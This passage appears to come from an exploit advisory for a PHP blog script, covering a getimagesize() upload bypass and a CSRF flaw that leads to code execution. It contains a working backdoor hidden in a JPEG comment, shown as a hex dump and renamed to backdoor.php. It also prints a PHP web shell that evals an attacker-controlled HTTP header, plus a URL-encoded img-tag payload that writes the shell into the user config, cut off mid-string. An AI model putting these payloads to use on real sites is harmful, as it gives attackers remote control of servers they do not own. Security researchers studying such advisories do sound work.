&nbsp;&nbsp;43|&nbsp;	if&nbsp;(!file_exists($uploaddir))&nbsp;{
&nbsp;&nbsp;44|&nbsp;		$oldumask&nbsp;=&nbsp;umask(0);
&nbsp;&nbsp;45|&nbsp;		@mkdir($uploaddir,&nbsp;0777&nbsp;);
&nbsp;&nbsp;46|&nbsp;		@umask($oldumask);
&nbsp;&nbsp;47|&nbsp;	}
&nbsp;&nbsp;48|&nbsp;		
&nbsp;&nbsp;49|&nbsp;	$uploaddir&nbsp;.=&nbsp;'/';
&nbsp;&nbsp;50|&nbsp;	$uploadfile&nbsp;=&nbsp;$uploaddir.
&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;preg_replace(&quot;/&nbsp;/&quot;,&quot;_&quot;,$_FILES[&nbsp;'user_emot'&nbsp;][&nbsp;'name'&nbsp;]);
&nbsp;&nbsp;51|&nbsp;
&nbsp;&nbsp;52|&nbsp;	if&nbsp;(@is_uploaded_file($_FILES['user_emot']['tmp_name']))&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;53|&nbsp;	if&nbsp;(@getimagesize($_FILES['user_emot']['tmp_name'])&nbsp;==&nbsp;FALSE){
&nbsp;&nbsp;54|&nbsp;		$ok&nbsp;=&nbsp;-1;
&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;55|&nbsp;	}&nbsp;else&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;56|&nbsp;	if&nbsp;(@move_uploaded_file($_FILES['user_emot']['tmp_name'],&nbsp;$uploadfile)){
&nbsp;&nbsp;57|&nbsp;		chmod(&nbsp;$uploadfile,&nbsp;0777&nbsp;);
&nbsp;&nbsp;58|&nbsp;		$ok&nbsp;=&nbsp;true;
&nbsp;&nbsp;59|&nbsp;	}

&nbsp;&nbsp;As&nbsp;you&nbsp;can&nbsp;see,&nbsp;there&nbsp;is&nbsp;only&nbsp;one&nbsp;protection&nbsp;against&nbsp;file
&nbsp;&nbsp;upload&nbsp;vulnerability.&nbsp;The&nbsp;function&nbsp;getimagesize()&nbsp;will
&nbsp;&nbsp;return&nbsp;FALSE&nbsp;if&nbsp;the&nbsp;upload&nbsp;file&nbsp;isn't&nbsp;a&nbsp;valid&nbsp;image&nbsp;file.
&nbsp;&nbsp;But&nbsp;we&nbsp;can&nbsp;bypass&nbsp;this&nbsp;easily.&nbsp;Take&nbsp;a&nbsp;look&nbsp;at&nbsp;this:

&nbsp;&nbsp;C:\&gt;edjpgcom&nbsp;img1x1.jpg

&nbsp;&nbsp;C:\&gt;hexdump&nbsp;img1x1.jpg

&nbsp;&nbsp;ff&nbsp;d8&nbsp;ff&nbsp;e0&nbsp;00&nbsp;10&nbsp;4a&nbsp;46&nbsp;-&nbsp;49&nbsp;46&nbsp;00&nbsp;01&nbsp;01&nbsp;01&nbsp;00&nbsp;60&nbsp;&nbsp;&nbsp;......JF&nbsp;IF......
&nbsp;&nbsp;00&nbsp;60&nbsp;00&nbsp;00&nbsp;ff&nbsp;db&nbsp;00&nbsp;43&nbsp;-&nbsp;00&nbsp;08&nbsp;06&nbsp;06&nbsp;07&nbsp;06&nbsp;05&nbsp;08&nbsp;&nbsp;&nbsp;.......C&nbsp;........
&nbsp;&nbsp;07&nbsp;07&nbsp;07&nbsp;09&nbsp;09&nbsp;08&nbsp;0a&nbsp;0c&nbsp;-&nbsp;14&nbsp;0d&nbsp;0c&nbsp;0b&nbsp;0b&nbsp;0c&nbsp;19&nbsp;12&nbsp;&nbsp;&nbsp;........&nbsp;........
&nbsp;&nbsp;13&nbsp;0f&nbsp;14&nbsp;1d&nbsp;1a&nbsp;1f&nbsp;1e&nbsp;1d&nbsp;-&nbsp;1a&nbsp;1c&nbsp;1c&nbsp;20&nbsp;24&nbsp;2e&nbsp;27&nbsp;20&nbsp;&nbsp;&nbsp;........&nbsp;........
&nbsp;&nbsp;22&nbsp;2c&nbsp;23&nbsp;1c&nbsp;1c&nbsp;28&nbsp;37&nbsp;29&nbsp;-&nbsp;2c&nbsp;30&nbsp;31&nbsp;34&nbsp;34&nbsp;34&nbsp;1f&nbsp;27&nbsp;&nbsp;&nbsp;......7.&nbsp;.01444..
&nbsp;&nbsp;39&nbsp;3d&nbsp;38&nbsp;32&nbsp;3c&nbsp;2e&nbsp;33&nbsp;34&nbsp;-&nbsp;32&nbsp;ff&nbsp;db&nbsp;00&nbsp;43&nbsp;01&nbsp;09&nbsp;09&nbsp;&nbsp;&nbsp;9.82..34&nbsp;2...C...
&nbsp;&nbsp;09&nbsp;0c&nbsp;0b&nbsp;0c&nbsp;18&nbsp;0d&nbsp;0d&nbsp;18&nbsp;-&nbsp;32&nbsp;21&nbsp;1c&nbsp;21&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;&nbsp;&nbsp;........&nbsp;2...2222
&nbsp;&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;-&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;&nbsp;&nbsp;22222222&nbsp;22222222
&nbsp;&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;-&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;&nbsp;&nbsp;22222222&nbsp;22222222
&nbsp;&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;-&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;32&nbsp;ff&nbsp;fe&nbsp;&nbsp;&nbsp;22222222&nbsp;222222..
&nbsp;&nbsp;00&nbsp;26&nbsp;3c&nbsp;3f&nbsp;70&nbsp;68&nbsp;70&nbsp;20&nbsp;-&nbsp;65&nbsp;76&nbsp;61&nbsp;6c&nbsp;28&nbsp;24&nbsp;5f&nbsp;53&nbsp;&nbsp;&nbsp;....php.&nbsp;eval...S
&nbsp;&nbsp;45&nbsp;52&nbsp;56&nbsp;45&nbsp;52&nbsp;5b&nbsp;48&nbsp;54&nbsp;-&nbsp;54&nbsp;50&nbsp;5f&nbsp;53&nbsp;48&nbsp;45&nbsp;4c&nbsp;4c&nbsp;&nbsp;&nbsp;ERVER.HT&nbsp;TP.SHELL
&nbsp;&nbsp;5d&nbsp;29&nbsp;3b&nbsp;20&nbsp;3f&nbsp;3e&nbsp;ff&nbsp;c0&nbsp;-&nbsp;00&nbsp;11&nbsp;08&nbsp;00&nbsp;01&nbsp;00&nbsp;01&nbsp;03&nbsp;&nbsp;&nbsp;........&nbsp;........
&nbsp;&nbsp;01&nbsp;22&nbsp;00&nbsp;02&nbsp;11&nbsp;01&nbsp;03&nbsp;11&nbsp;-&nbsp;01&nbsp;ff&nbsp;c4&nbsp;00&nbsp;1f&nbsp;00&nbsp;00&nbsp;01&nbsp;&nbsp;&nbsp;........&nbsp;........
&nbsp;&nbsp;05&nbsp;01&nbsp;01&nbsp;01&nbsp;01&nbsp;01&nbsp;01&nbsp;00&nbsp;-&nbsp;00&nbsp;00&nbsp;00&nbsp;00&nbsp;00&nbsp;00&nbsp;00&nbsp;01&nbsp;&nbsp;&nbsp;........&nbsp;........
&nbsp;&nbsp;02&nbsp;03&nbsp;04&nbsp;05&nbsp;06&nbsp;07&nbsp;08&nbsp;09&nbsp;-&nbsp;0a&nbsp;0b&nbsp;ff&nbsp;c4&nbsp;00&nbsp;b5&nbsp;10&nbsp;00&nbsp;&nbsp;&nbsp;........&nbsp;........
&nbsp;&nbsp;02&nbsp;01&nbsp;03&nbsp;03&nbsp;02&nbsp;04&nbsp;03&nbsp;05&nbsp;-&nbsp;05&nbsp;04&nbsp;04&nbsp;00&nbsp;00&nbsp;01&nbsp;7d&nbsp;01&nbsp;&nbsp;&nbsp;........&nbsp;........
&nbsp;&nbsp;02&nbsp;03&nbsp;00&nbsp;04&nbsp;11&nbsp;05&nbsp;12&nbsp;21&nbsp;-&nbsp;31&nbsp;41&nbsp;06&nbsp;13&nbsp;51&nbsp;61&nbsp;07&nbsp;22&nbsp;&nbsp;&nbsp;........&nbsp;1A..Qa..
&nbsp;&nbsp;71&nbsp;14&nbsp;32&nbsp;81&nbsp;91&nbsp;a1&nbsp;08&nbsp;23&nbsp;-&nbsp;42&nbsp;b1&nbsp;c1&nbsp;15&nbsp;52&nbsp;d1&nbsp;f0&nbsp;24&nbsp;&nbsp;&nbsp;q.2.....&nbsp;B...R...
&nbsp;&nbsp;33&nbsp;62&nbsp;72&nbsp;82&nbsp;09&nbsp;0a&nbsp;16&nbsp;17&nbsp;-&nbsp;18&nbsp;19&nbsp;1a&nbsp;25&nbsp;26&nbsp;27&nbsp;28&nbsp;29&nbsp;&nbsp;&nbsp;3br.....&nbsp;........
&nbsp;&nbsp;2a&nbsp;34&nbsp;35&nbsp;36&nbsp;37&nbsp;38&nbsp;39&nbsp;3a&nbsp;-&nbsp;43&nbsp;44&nbsp;45&nbsp;46&nbsp;47&nbsp;48&nbsp;49&nbsp;4a&nbsp;&nbsp;&nbsp;.456789.&nbsp;CDEFGHIJ
&nbsp;&nbsp;53&nbsp;54&nbsp;55&nbsp;56&nbsp;57&nbsp;58&nbsp;59&nbsp;5a&nbsp;-&nbsp;63&nbsp;64&nbsp;65&nbsp;66&nbsp;67&nbsp;68&nbsp;69&nbsp;6a&nbsp;&nbsp;&nbsp;STUVWXYZ&nbsp;cdefghij
&nbsp;&nbsp;73&nbsp;74&nbsp;75&nbsp;76&nbsp;77&nbsp;78&nbsp;79&nbsp;7a&nbsp;-&nbsp;83&nbsp;84&nbsp;85&nbsp;86&nbsp;87&nbsp;88&nbsp;89&nbsp;8a&nbsp;&nbsp;&nbsp;stuvwxyz&nbsp;........
&nbsp;&nbsp;92&nbsp;93&nbsp;94&nbsp;95&nbsp;96&nbsp;97&nbsp;98&nbsp;99&nbsp;-&nbsp;9a&nbsp;a2&nbsp;a3&nbsp;a4&nbsp;a5&nbsp;a6&nbsp;a7&nbsp;a8&nbsp;&nbsp;&nbsp;........&nbsp;........
&nbsp;&nbsp;a9&nbsp;aa&nbsp;b2&nbsp;b3&nbsp;b4&nbsp;b5&nbsp;b6&nbsp;b7&nbsp;-&nbsp;b8&nbsp;b9&nbsp;ba&nbsp;c2&nbsp;c3&nbsp;c4&nbsp;c5&nbsp;c6&nbsp;&nbsp;&nbsp;........&nbsp;........
&nbsp;&nbsp;c7&nbsp;c8&nbsp;c9&nbsp;ca&nbsp;d2&nbsp;d3&nbsp;d4&nbsp;d5&nbsp;-&nbsp;d6&nbsp;d7&nbsp;d8&nbsp;d9&nbsp;da&nbsp;e1&nbsp;e2&nbsp;e3&nbsp;&nbsp;&nbsp;........&nbsp;........
&nbsp;&nbsp;e4&nbsp;e5&nbsp;e6&nbsp;e7&nbsp;e8&nbsp;e9&nbsp;ea&nbsp;f1&nbsp;-&nbsp;f2&nbsp;f3&nbsp;f4&nbsp;f5&nbsp;f6&nbsp;f7&nbsp;f8&nbsp;f9&nbsp;&nbsp;&nbsp;........&nbsp;........
&nbsp;&nbsp;fa&nbsp;ff&nbsp;c4&nbsp;00&nbsp;1f&nbsp;01&nbsp;00&nbsp;03&nbsp;-&nbsp;01&nbsp;01&nbsp;01&nbsp;01&nbsp;01&nbsp;01&nbsp;01&nbsp;01&nbsp;&nbsp;&nbsp;........&nbsp;........
&nbsp;&nbsp;01&nbsp;00&nbsp;00&nbsp;00&nbsp;00&nbsp;00&nbsp;00&nbsp;01&nbsp;-&nbsp;02&nbsp;03&nbsp;04&nbsp;05&nbsp;06&nbsp;07&nbsp;08&nbsp;09&nbsp;&nbsp;&nbsp;........&nbsp;........
&nbsp;&nbsp;0a&nbsp;0b&nbsp;ff&nbsp;c4&nbsp;00&nbsp;b5&nbsp;11&nbsp;00&nbsp;-&nbsp;02&nbsp;01&nbsp;02&nbsp;04&nbsp;04&nbsp;03&nbsp;04&nbsp;07&nbsp;&nbsp;&nbsp;........&nbsp;........
&nbsp;&nbsp;05&nbsp;04&nbsp;04&nbsp;00&nbsp;01&nbsp;02&nbsp;77&nbsp;00&nbsp;-&nbsp;01&nbsp;02&nbsp;03&nbsp;11&nbsp;04&nbsp;05&nbsp;21&nbsp;31&nbsp;&nbsp;&nbsp;......w.&nbsp;.......1
&nbsp;&nbsp;06&nbsp;12&nbsp;41&nbsp;51&nbsp;07&nbsp;61&nbsp;71&nbsp;13&nbsp;-&nbsp;22&nbsp;32&nbsp;81&nbsp;08&nbsp;14&nbsp;42&nbsp;91&nbsp;a1&nbsp;&nbsp;&nbsp;..AQ.aq.&nbsp;.2...B..
&nbsp;&nbsp;b1&nbsp;c1&nbsp;09&nbsp;23&nbsp;33&nbsp;52&nbsp;f0&nbsp;15&nbsp;-&nbsp;62&nbsp;72&nbsp;d1&nbsp;0a&nbsp;16&nbsp;24&nbsp;34&nbsp;e1&nbsp;&nbsp;&nbsp;....3R..&nbsp;br....4.
&nbsp;&nbsp;25&nbsp;f1&nbsp;17&nbsp;18&nbsp;19&nbsp;1a&nbsp;26&nbsp;27&nbsp;-&nbsp;28&nbsp;29&nbsp;2a&nbsp;35&nbsp;36&nbsp;37&nbsp;38&nbsp;39&nbsp;&nbsp;&nbsp;........&nbsp;...56789
&nbsp;&nbsp;3a&nbsp;43&nbsp;44&nbsp;45&nbsp;46&nbsp;47&nbsp;48&nbsp;49&nbsp;-&nbsp;4a&nbsp;53&nbsp;54&nbsp;55&nbsp;56&nbsp;57&nbsp;58&nbsp;59&nbsp;&nbsp;&nbsp;.CDEFGHI&nbsp;JSTUVWXY
&nbsp;&nbsp;5a&nbsp;63&nbsp;64&nbsp;65&nbsp;66&nbsp;67&nbsp;68&nbsp;69&nbsp;-&nbsp;6a&nbsp;73&nbsp;74&nbsp;75&nbsp;76&nbsp;77&nbsp;78&nbsp;79&nbsp;&nbsp;&nbsp;Zcdefghi&nbsp;jstuvwxy
&nbsp;&nbsp;7a&nbsp;82&nbsp;83&nbsp;84&nbsp;85&nbsp;86&nbsp;87&nbsp;88&nbsp;-&nbsp;89&nbsp;8a&nbsp;92&nbsp;93&nbsp;94&nbsp;95&nbsp;96&nbsp;97&nbsp;&nbsp;&nbsp;z.......&nbsp;........
&nbsp;&nbsp;98&nbsp;99&nbsp;9a&nbsp;a2&nbsp;a3&nbsp;a4&nbsp;a5&nbsp;a6&nbsp;-&nbsp;a7&nbsp;a8&nbsp;a9&nbsp;aa&nbsp;b2&nbsp;b3&nbsp;b4&nbsp;b5&nbsp;&nbsp;&nbsp;........&nbsp;........
&nbsp;&nbsp;b6&nbsp;b7&nbsp;b8&nbsp;b9&nbsp;ba&nbsp;c2&nbsp;c3&nbsp;c4&nbsp;-&nbsp;c5&nbsp;c6&nbsp;c7&nbsp;c8&nbsp;c9&nbsp;ca&nbsp;d2&nbsp;d3&nbsp;&nbsp;&nbsp;........&nbsp;........
&nbsp;&nbsp;d4&nbsp;d5&nbsp;d6&nbsp;d7&nbsp;d8&nbsp;d9&nbsp;da&nbsp;e2&nbsp;-&nbsp;e3&nbsp;e4&nbsp;e5&nbsp;e6&nbsp;e7&nbsp;e8&nbsp;e9&nbsp;ea&nbsp;&nbsp;&nbsp;........&nbsp;........
&nbsp;&nbsp;f2&nbsp;f3&nbsp;f4&nbsp;f5&nbsp;f6&nbsp;f7&nbsp;f8&nbsp;f9&nbsp;-&nbsp;fa&nbsp;ff&nbsp;da&nbsp;00&nbsp;0c&nbsp;03&nbsp;01&nbsp;00&nbsp;&nbsp;&nbsp;........&nbsp;........
&nbsp;&nbsp;02&nbsp;11&nbsp;03&nbsp;11&nbsp;00&nbsp;3f&nbsp;00&nbsp;f7&nbsp;-&nbsp;fa&nbsp;28&nbsp;a2&nbsp;80&nbsp;3f&nbsp;ff&nbsp;d9&nbsp;d9&nbsp;&nbsp;&nbsp;........&nbsp;........

&nbsp;&nbsp;C:\&gt;ren&nbsp;img1x1.jpg&nbsp;backdoor.php

&nbsp;&nbsp;The&nbsp;created&nbsp;file&nbsp;is&nbsp;a&nbsp;valid&nbsp;jpg&nbsp;image,&nbsp;so&nbsp;the&nbsp;check&nbsp;made
&nbsp;&nbsp;by&nbsp;the&nbsp;function&nbsp;getimagesize()&nbsp;will&nbsp;be&nbsp;bypassed.&nbsp;And&nbsp;so
&nbsp;&nbsp;the&nbsp;backdoor&nbsp;will&nbsp;be&nbsp;uploaded&nbsp;in&nbsp;&quot;images/emoticons&quot;.



&nbsp;&nbsp;VIII&nbsp;-&nbsp;CODE&nbsp;EXECUTION&nbsp;(+CSRF)

&nbsp;&nbsp;There&nbsp;is&nbsp;a&nbsp;CSRF&nbsp;vulnerability&nbsp;which&nbsp;can&nbsp;lead&nbsp;to&nbsp;execute
&nbsp;&nbsp;PHP&nbsp;code,&nbsp;this&nbsp;is&nbsp;the&nbsp;critical&nbsp;point&nbsp;of&nbsp;this&nbsp;script.
&nbsp;&nbsp;Let's&nbsp;see&nbsp;the&nbsp;code&nbsp;of&nbsp;the&nbsp;file&nbsp;&quot;manage_users.php&quot;:

&nbsp;&nbsp;&nbsp;61|&nbsp;if&nbsp;(&nbsp;$_GET[&nbsp;'action'&nbsp;]&nbsp;==&nbsp;&quot;update&quot;&nbsp;)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;&nbsp;63|&nbsp;&nbsp;if&nbsp;($_SESSION[&nbsp;'fulladmin'&nbsp;]&nbsp;!=&nbsp;'yes'&nbsp;)&nbsp;{
&nbsp;&nbsp;&nbsp;64|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo($lang_string['fulladminerror']);
&nbsp;&nbsp;&nbsp;65|&nbsp;}&nbsp;else&nbsp;{
&nbsp;&nbsp;&nbsp;66|&nbsp;
&nbsp;&nbsp;&nbsp;67|&nbsp;&nbsp;&nbsp;//&nbsp;First&nbsp;read&nbsp;and&nbsp;remove&nbsp;the&nbsp;offending&nbsp;line
&nbsp;&nbsp;&nbsp;68|&nbsp;&nbsp;&nbsp;$pfile&nbsp;=&nbsp;fopen(&quot;config/users.php&quot;,&quot;a+&quot;);
&nbsp;&nbsp;&nbsp;69|&nbsp;&nbsp;&nbsp;rewind($pfile);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;&nbsp;70|&nbsp;&nbsp;&nbsp;while&nbsp;(!feof($pfile))&nbsp;{
&nbsp;&nbsp;&nbsp;71|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$line&nbsp;=&nbsp;fgets($pfile);
&nbsp;&nbsp;&nbsp;72|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$tmp&nbsp;=&nbsp;explode('|',&nbsp;$line);
&nbsp;&nbsp;&nbsp;73|&nbsp;
&nbsp;&nbsp;&nbsp;74|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(&nbsp;$_GET[&nbsp;'type'&nbsp;]&nbsp;==&nbsp;&quot;edit&quot;&nbsp;)&nbsp;{
&nbsp;&nbsp;&nbsp;75|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(&nbsp;$tmp[1]&nbsp;!=&nbsp;$_GET[&nbsp;'user'&nbsp;]&nbsp;)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;$newfile&nbsp;=&nbsp;$newfile&nbsp;.&nbsp;$line;&nbsp;}
&nbsp;&nbsp;&nbsp;76|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;else&nbsp;{
&nbsp;&nbsp;&nbsp;77|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$newfile&nbsp;=&nbsp;$newfile&nbsp;.&nbsp;$line;
&nbsp;&nbsp;&nbsp;78|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;79|&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;80|&nbsp;&nbsp;&nbsp;fclose($pfile);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;101|&nbsp;&nbsp;&nbsp;$blankfield&nbsp;=&nbsp;&quot;&quot;;
&nbsp;&nbsp;102|&nbsp;
&nbsp;&nbsp;103|&nbsp;&nbsp;&nbsp;//&nbsp;Create&nbsp;the&nbsp;record&nbsp;structure
&nbsp;&nbsp;104|&nbsp;&nbsp;&nbsp;if&nbsp;(&nbsp;$_GET[&nbsp;'type'&nbsp;]&nbsp;==&nbsp;&quot;edit&quot;&nbsp;)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;107|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$password&nbsp;=&nbsp;$_GET[&nbsp;'oldpasshash'&nbsp;];
&nbsp;&nbsp;108|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(&nbsp;$password&nbsp;!=&nbsp;$_POST[&nbsp;'sPassword'&nbsp;]&nbsp;)&nbsp;{
&nbsp;&nbsp;109|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$password&nbsp;=&nbsp;crypt($_GET[&nbsp;'user'&nbsp;],$_POST[&nbsp;'sPassword'&nbsp;]&nbsp;);
&nbsp;&nbsp;110|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;111|&nbsp;
&nbsp;&nbsp;112|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$array&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;array($_POST[&nbsp;'sFullname'&nbsp;],&nbsp;$_GET[&nbsp;'user'&nbsp;],&nbsp;$password,
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$_POST[&nbsp;'sAvatar'&nbsp;],&nbsp;$active,&nbsp;$_POST[&nbsp;'sEmail'&nbsp;],
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$modcomments,&nbsp;$deleteentries,&nbsp;$editany,&nbsp;$blankfield);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;113|&nbsp;&nbsp;&nbsp;}&nbsp;else&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;114|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$array&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;array($_POST[&nbsp;'sFullname'&nbsp;],&nbsp;$_POST[&nbsp;'sUsername'&nbsp;],
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;crypt(&nbsp;$_POST[&nbsp;'sUsername'&nbsp;],&nbsp;$_POST[&nbsp;'sPassword'&nbsp;]&nbsp;),
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$_POST[&nbsp;'sAvatar'&nbsp;],&nbsp;$active,&nbsp;$_POST[&nbsp;'sEmail'&nbsp;],
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$modcomments,&nbsp;$deleteentries,&nbsp;$editany,&nbsp;$blankfield);
&nbsp;&nbsp;115|&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;116|&nbsp;&nbsp;&nbsp;$str&nbsp;=&nbsp;implode('|',&nbsp;$array);
&nbsp;&nbsp;117|&nbsp;&nbsp;&nbsp;$newfile&nbsp;=&nbsp;$newfile&nbsp;.&nbsp;$str&nbsp;.&nbsp;&quot;n&quot;;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;120|&nbsp;&nbsp;&nbsp;$pfile&nbsp;=&nbsp;fopen(&quot;config/users.php&quot;,&quot;w&quot;);
&nbsp;&nbsp;121|&nbsp;&nbsp;&nbsp;fwrite($pfile,&nbsp;$newfile);
&nbsp;&nbsp;122|&nbsp;&nbsp;&nbsp;fclose($pfile);
&nbsp;&nbsp;123|&nbsp;
&nbsp;&nbsp;124|&nbsp;&nbsp;&nbsp;redirect_to_url(&quot;manage_users.php&quot;);
&nbsp;&nbsp;125|&nbsp;}
&nbsp;&nbsp;126|&nbsp;}

&nbsp;&nbsp;As&nbsp;you&nbsp;can&nbsp;see&nbsp;there&nbsp;is&nbsp;no&nbsp;protection&nbsp;against&nbsp;PHP&nbsp;chars&nbsp;
&nbsp;&nbsp;(like&nbsp;strip_tags())&nbsp;before&nbsp;inserting&nbsp;user's&nbsp;data&nbsp;into
&nbsp;&nbsp;the&nbsp;php&nbsp;file.&nbsp;But&nbsp;the&nbsp;author&nbsp;of&nbsp;the&nbsp;script&nbsp;add&nbsp;a&nbsp;&quot;.htaccess&quot;
&nbsp;&nbsp;file&nbsp;in&nbsp;the&nbsp;&quot;config&quot;&nbsp;directory.&nbsp;Let's&nbsp;see&nbsp;the&nbsp;content&nbsp;of
&nbsp;&nbsp;this&nbsp;file:&nbsp;
&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;1|&nbsp;IndexIgnore&nbsp;*
&nbsp;&nbsp;&nbsp;2|&nbsp;
&nbsp;&nbsp;&nbsp;3|&nbsp;&lt;Files&nbsp;.htaccess&gt;
&nbsp;&nbsp;&nbsp;4|&nbsp;order&nbsp;allow,deny
&nbsp;&nbsp;&nbsp;5|&nbsp;deny&nbsp;from&nbsp;all
&nbsp;&nbsp;&nbsp;6|&nbsp;&lt;/Files&gt;
&nbsp;&nbsp;&nbsp;7|&nbsp;
&nbsp;&nbsp;&nbsp;8|&nbsp;&lt;Files&nbsp;*.txt&gt;
&nbsp;&nbsp;&nbsp;9|&nbsp;order&nbsp;allow,deny
&nbsp;&nbsp;10|&nbsp;deny&nbsp;from&nbsp;all
&nbsp;&nbsp;11|&nbsp;&lt;/Files&gt;

&nbsp;&nbsp;So&nbsp;we&nbsp;can't&nbsp;list&nbsp;the&nbsp;content&nbsp;of&nbsp;the&nbsp;directory,&nbsp;and&nbsp;we
&nbsp;&nbsp;don't&nbsp;have&nbsp;access&nbsp;to&nbsp;.htaccess/.txt&nbsp;files.&nbsp;But&nbsp;we&nbsp;can
&nbsp;&nbsp;access&nbsp;to&nbsp;.php&nbsp;files&nbsp;!&nbsp;This&nbsp;require&nbsp;admin&nbsp;rights...
&nbsp;&nbsp;but&nbsp;we&nbsp;can&nbsp;write&nbsp;PHP&nbsp;code&nbsp;with&nbsp;the&nbsp;GET&nbsp;method,&nbsp;that's
&nbsp;&nbsp;why&nbsp;there's&nbsp;also&nbsp;a&nbsp;CSRF&nbsp;vulnerability.&nbsp;In&nbsp;our&nbsp;example
&nbsp;&nbsp;we&nbsp;will&nbsp;take&nbsp;this&nbsp;php&nbsp;code&nbsp;(as&nbsp;you&nbsp;can&nbsp;see&nbsp;we&nbsp;don't
&nbsp;&nbsp;need&nbsp;magic_quote_gpc=Off):

&nbsp;&nbsp;&nbsp;1|&nbsp;&lt;?php
&nbsp;&nbsp;&nbsp;2|&nbsp;
&nbsp;&nbsp;&nbsp;3|&nbsp;if(isset($_GET[mail]))
&nbsp;&nbsp;&nbsp;4|&nbsp;{
&nbsp;&nbsp;&nbsp;5|&nbsp;$mail&nbsp;=&nbsp;&lt;&lt;&lt;MAIL
&nbsp;&nbsp;&nbsp;6|&nbsp;[email protected]
&nbsp;&nbsp;&nbsp;7|&nbsp;MAIL;
&nbsp;&nbsp;&nbsp;8|&nbsp;
&nbsp;&nbsp;&nbsp;9|&nbsp;$subject&nbsp;=&nbsp;&lt;&lt;&lt;SUBJ
&nbsp;&nbsp;10|&nbsp;Hey&nbsp;!
&nbsp;&nbsp;11|&nbsp;SUBJ;
&nbsp;&nbsp;12|&nbsp;
&nbsp;&nbsp;13|&nbsp;$body&nbsp;=&nbsp;&lt;&lt;&lt;BODY
&nbsp;&nbsp;14|&nbsp;Code&nbsp;executed
&nbsp;&nbsp;15|&nbsp;BODY;
&nbsp;&nbsp;16|&nbsp;
&nbsp;&nbsp;17|&nbsp;mail($mail,$subject,$body);
&nbsp;&nbsp;18|&nbsp;}
&nbsp;&nbsp;19|&nbsp;else&nbsp;eval($_SERVER[HTTP_SHELL]);
&nbsp;&nbsp;20|&nbsp;
&nbsp;&nbsp;21|&nbsp;?&gt;

&nbsp;&nbsp;So&nbsp;the&nbsp;attacker&nbsp;just&nbsp;have&nbsp;to&nbsp;post&nbsp;(using&nbsp;the&nbsp;XSS)
&nbsp;&nbsp;something&nbsp;like&nbsp;this:

&nbsp;&nbsp;&lt;img&nbsp;src=http://&lt;site&gt;/manage_users.php?action=update
&nbsp;&nbsp;&amp;type=edit&amp;user=%3C%3Fphp%0D%0A%0D%0Aif%28isset%28%24
&nbsp;&nbsp;_GET%5Bmail%5D%29%29%0D%0A%7B%0D%0A%24mail+%3D+%3C%3C
